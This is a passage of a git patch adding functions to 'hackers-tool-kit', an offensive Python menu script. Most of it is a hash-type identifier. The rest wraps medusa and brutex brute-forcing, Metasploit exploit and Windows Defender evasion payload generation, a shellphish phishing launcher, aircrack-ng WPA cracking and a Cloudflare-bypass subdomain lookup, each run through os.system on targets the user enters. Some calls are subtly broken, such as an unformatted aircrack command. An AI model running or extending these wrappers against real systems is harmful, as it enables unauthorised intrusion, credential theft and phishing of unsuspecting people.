hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +def upgrade(): + os.system("apt update && apt upgrade") +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +def about(): + print "\033[92m------------------------------------------------------------" + print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" + print "------------------------------------------------------------" + print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" + print "------------------------------------------------------------" + print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" + print "------------------------------------------------------------" + print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" + print "------------------------------------------------------------\033[0m" +def terminal(): + os.system("gnome-terminal") +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "about": + about() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + found = True +mainbanner() +main() From 04fb39e6f64c6475f41e20bee4410f491e9419ac Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sat, 30 Mar 2019 16:30:17 +0100 Subject: [PATCH 076/214] Update README.md --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 7f502c5..db7c33a 100644 --- a/README.md +++ b/README.md @@ -18,6 +18,8 @@ my instagram @unkn0wn_bali # Run +ROOT IS NOT REQUIRED TO RUN BUT IS RECOMMENDED + * `cd 